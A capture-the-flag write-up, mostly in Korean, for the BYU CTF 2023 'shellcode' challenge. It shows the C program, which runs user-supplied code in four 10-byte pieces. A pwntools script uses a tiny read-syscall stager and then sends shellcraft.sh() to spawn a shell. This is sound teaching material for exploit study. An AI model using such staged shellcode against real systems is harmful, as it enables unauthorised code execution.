BYU CTF 2023 - Shellcode (shellcode)

WriteUpBYU

You’ll have to make your own shellcode for this one!
nc byuctf.xyz 40017
tag: medium

  • [51 solves / 452 points]

Analysis

소스 코드가 주어져 있다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define MAP_ANONYMOUS 0x20

__attribute__((constructor)) void flush_buf() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}

int main() {
    // create memory for shellcode to reside in
    mmap((char *)0x777777000, 71, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);

    // set first 51 bytes to 0s
    memset((char *)0x777777000, 0x00, 51);

    // get first 10 bytes of shellcode
    char shellcode_one[10];
    puts("Enter first 10 bytes of shellcode: ");
    read(0, shellcode_one, 10);
    memcpy((char *)0x777777000, shellcode_one, 10);

    // get second 10 bytes of shellcode
    char shellcode_two[10];
    puts("Enter second 10 bytes of shellcode: ");
    read(0, shellcode_two, 10);
    memcpy((char *)0x777777020, shellcode_two, 10);

    // get third 10 bytes of shellcode
    char shellcode_three[10];
    puts("Enter third 10 bytes of shellcode: ");
    read(0, shellcode_three, 10);
    memcpy((char *)0x777777040, shellcode_three, 10);

    // get last 10 bytes of shellcode
    char shellcode_four[10];
    puts("Enter last 10 bytes of shellcode: ");
    read(0, shellcode_four, 10);
    memcpy((char *)0x777777060, shellcode_four, 10);

    // call shellcode
    ((void (*)())0x777777000)();
    return 0;
}

0x777777000 주소부터 실행권한을 주었다. 그리고 10바이트씩 shellcode를 입력한다. 이때 10바이트 null이 생긴다. 마지막엔 0x777777000을 실행시킨다. 바로 든 생각은 처음에 shellcode를 입력할 때 read(0, 0x777777000, size) syscall을 입력하면 10바이트 띄엄띄엄 입력하는 한계를 없앨 수 있겠다고 생각했다. 단 내가 가장 실행하고 싶은 syscall이 10바이트 이내여야 한다.

다행히 마지막 call shellcode를 할 때 레지스터 상황은 아래와 같았고, mov rsi, rdxsyscall을 실행시킴으로써 내 의도대로 문제를 풀 수 있었다.

1
2
3
4
$rax   : 0x0  
$rdi   : 0x0   
$rsi   : 0x007fffffffe58e  →  0x00000a64646464 ("dddd\n"?)
$rdx   : 0x00000777777000  →  0x00000a61616161 ("aaaa\n"?)

Solve

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

context.arch = 'amd64'
context.log_level = 'DEBUG'

p = process('./shellcode')
e = ELF('./shellcode')

# $rax   : 0x0  
# $rdi   : 0x0   
# $rsi   : 0x007fffffffe58e  →  0x00000a64646464 ("dddd\n"?)
# $rdx   : 0x00000777777000  →  0x00000a61616161 ("aaaa\n"?)

# 4 bytes
# read(0, 0x00000777777000,)
shellcode_one = '''
mov rsi, rdx
syscall
'''

print(asm(shellcode_one)) 
p.sendafter(':', asm(shellcode_one)) 
p.sendafter(':', p64(0)) 
p.sendafter(':', p64(0)) 
pause()
p.sendafter(':', p64(0)) 

shellcode = shellcraft.sh()
# pause()
p.send(b'a'*5 + asm(shellcode))

p.interactive()